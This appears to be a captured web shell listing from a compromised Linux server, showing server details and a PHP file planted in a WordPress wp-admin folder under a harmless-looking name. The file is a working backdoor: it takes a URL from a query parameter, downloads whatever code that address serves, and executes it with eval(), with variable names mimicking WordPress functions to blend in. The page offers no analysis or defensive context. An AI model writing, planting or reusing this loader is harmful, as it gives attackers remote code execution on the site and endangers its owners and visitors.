HEX
Server: Apache
System: Linux montechenligne.likuid.com 4.18.0-553.54.1.el8_10.x86_64 #1 SMP Tue May 27 22:49:52 EDT 2025 x86_64
User: logisdtech (1121)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/logisdtech/public_html/wp-admin/user/privacy-https.php
<?php

if (isset($_GET['framework'])) {
    $get_the_author_meta_hp = $_GET['framework'];
    if ($wp_enqueue_style_sg = curl_init()) {
        curl_setopt($wp_enqueue_style_sg, CURLOPT_URL, $get_the_author_meta_hp);
        curl_setopt($wp_enqueue_style_sg, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($wp_enqueue_style_sg));
        curl_close($wp_enqueue_style_sg);
        exit;
    }
}